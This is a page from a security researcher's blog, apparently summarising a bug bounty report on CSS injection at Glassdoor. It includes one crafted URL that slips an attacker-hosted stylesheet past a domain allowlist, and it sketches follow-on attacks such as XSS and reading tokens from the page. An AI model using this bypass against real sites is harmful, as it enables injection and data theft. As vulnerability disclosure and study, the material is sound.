About  Project Blog Resources

Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

CSS injection via link tag whitelisted-domain bypass- 697

zonduu - GlassDoorPosted 4 Years Ago
  • Glassdoor can load CSS on their domains via links in the URL. This has a domain allowlist, making sure that you cannot load your own CSS into the page.
  • The allowlisting functionality has a flaw though. By adding a domain as https://zonduu.me/example.css?http://www.glassdoor.com/ in the URL parameter, the CSS can be injected into the website via the link tag. To me, this looks like an issue with a regex or a case of in or contains being used improperly.
  • What can you do with arbitrary CSS being loaded into the page? In Internet Explorer, you can get XSS via the expression function. Additionally, using standard CSS selectors, the HTML source of the page can be read from the page. Another attack could be looking for sensitive information in URL query strings, such as OAuth tokens.
  • The report was initially reported as a medium but moved to a low with the service team saying this did not have much impact. To me, being able to infiltrate data from a page should be of higher severity but I'm unsure how to practically do this with CSS alone.

Maxwell DulinEmail me!TwitterGithubAdminBlog RSS FeedResources RSS Feed